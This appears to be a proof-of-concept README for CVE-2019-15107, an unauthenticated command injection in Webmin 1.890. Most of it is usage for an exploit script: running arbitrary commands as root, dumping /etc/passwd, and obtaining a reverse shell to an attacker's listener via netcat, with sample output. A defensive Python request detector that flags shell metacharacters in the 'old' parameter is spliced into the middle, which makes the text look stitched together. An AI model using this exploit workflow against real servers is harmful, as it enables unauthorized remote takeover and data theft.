CVE-2019-15107 PoC — Webmin OS Command Injection Vulnerability

Associated Vulnerability
Title: Webmin OS Command Injection Vulnerability (CVE-2019-15107)
Description: An issue was discovered in Webmin <=1.920. The parameter old in password_change.cgi contains a command injection vulnerability.
Description
CVE-2019-15107 Webmin unauthenticated RCE
Readme
# CVE-2019-15107 Webmin 1.890 Unauthenticated Remote Code Execution

This script is designed to exploit an unauthenticated command execution vulnerability in Webmin 1.890. It allows you to execute arbitrary commands on a target Webmin server or to obtain a reverse shell.
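For defenders, the vulnerability description above (the `old` parameter of `password_change.cgi`) translates directly into a request-inspection check. The following is an added example, not part of the original README or of Webmin: it parses raw HTTP requests and flags POSTs to that CGI whose `old` value carries shell syntax. The sample requests, host name and metacharacter list are constructed assumptions.

```python
from urllib.parse import parse_qs

TARGET_PATH = "/password_change.cgi"   # CGI named in the CVE description
WATCHED_PARAMS = ("old",)              # parameter named in the CVE description
# Shell syntax that is unusual in a password; a hit is an alert to review, not proof.
SHELL_META = ("|", ";", "&", "`", "$(", "\n", ">", "<")

# Constructed sample requests (not captured traffic); the host is a placeholder.
SAMPLE_BENIGN = (b"POST /password_change.cgi HTTP/1.1\r\n"
                 b"Host: webmin.example\r\n\r\nold=hunter2")
SAMPLE_ALERT = (b"POST /password_change.cgi HTTP/1.1\r\n"
                b"Host: webmin.example\r\n\r\nold=abc%7Cexample")


def parse_request(raw: bytes):
    """Split a raw HTTP/1.x request into (method, path, body), or None."""
    head, _, body = raw.partition(b"\r\n\r\n")
    parts = head.split(b"\r\n", 1)[0].decode("latin-1").split(" ")
    if len(parts) < 2:
        return None
    path = parts[1].split("?", 1)[0]          # drop any query string
    return parts[0].upper(), path, body.decode("latin-1")


def suspicious_params(raw: bytes):
    """Return {param: [metachars]} for watched params carrying shell syntax."""
    parsed = parse_request(raw)
    if parsed is None:
        return {}
    method, path, body = parsed
    if method != "POST" or path.rstrip("/") != TARGET_PATH:
        return {}
    # parse_qs URL-decodes values, so %7C and a literal | are treated alike.
    fields = parse_qs(body, keep_blank_values=True)
    hits = {}
    for name in WATCHED_PARAMS:
        for value in fields.get(name, []):
            found = [m for m in SHELL_META if m in value]
            if found:
                hits.setdefault(name, []).extend(found)
    return hits


if __name__ == "__main__":
    for label, req in (("benign", SAMPLE_BENIGN), ("alert", SAMPLE_ALERT)):
        print(label, suspicious_params(req))
```

Because `&` separates form fields, a raw `&` never reaches the decoded value; only an encoded `%26` does, which is why the check runs after decoding.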

## Usage

The exploit takes 5 arguments:

```bash
$ python3 test.py -h                       
usage: test.py [-h] -i IP Address [-p Port number] [-c Command] [--shell] [-x]

Exploit unauthenticated command execution in Webmin 1.890.

options:
  -h, --help            show this help message and exit

required arguments:
  -i IP Address, --ip IP Address
                        Target ip address

optional arguments:
  -p Port number, --port Port number
                        Webmin port(default=10000)
  -c Command, --command Command
                        OS Command to execute (Default=id)
  --shell               Get a reverse shell
  -x, --proxy           Sends requests through Burp Suite proxy at 127.0.0.1:8080.

Example:
    python exploit.py -i 192.168.1.100
    python exploit.py -i 192.168.1.100 -p 10000 -c whoami
    python exploit.py -i 192.168.1.100 -x -c "ls -la"
    python exploit.py -i 192.168.1.100 --shell

```

The only required option is `-i`, which is the IP address of the target.

Running the exploit with only `-i` will execute the command `id` against the target on port `10000`:

```bash
$ python3 exploit.py -i 10.200.105.200 
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
```

### Command execution

You can specify what command to run using the `-c` or `--command` options:

```bash
$ python3 exploit.py -i 10.200.105.200 -c 'cat /etc/passwd'
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
[...]

```

### Reverse shell

You can also get a reverse shell by using the `--shell` option.

> You will be prompted to enter your IP address and the listening port:

```bash
$ python3 exploit.py -i 10.200.105.200 --shell 
Enter your ip address: 10.50.106.33
Enter your listening port: 9001
[+] Sending a shell to 10.50.106.33:9001...
```

```bash
$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.50.106.33] from (UNKNOWN) [10.200.105.200] 41446
[root@prod-serv ]# 
```

### Proxy

By adding the `-x` or `--proxy` option, you can send the request through the Burp proxy at 127.0.0.1:8080.

## References

<https://nvd.nist.gov/vuln/detail/cve-2019-15107>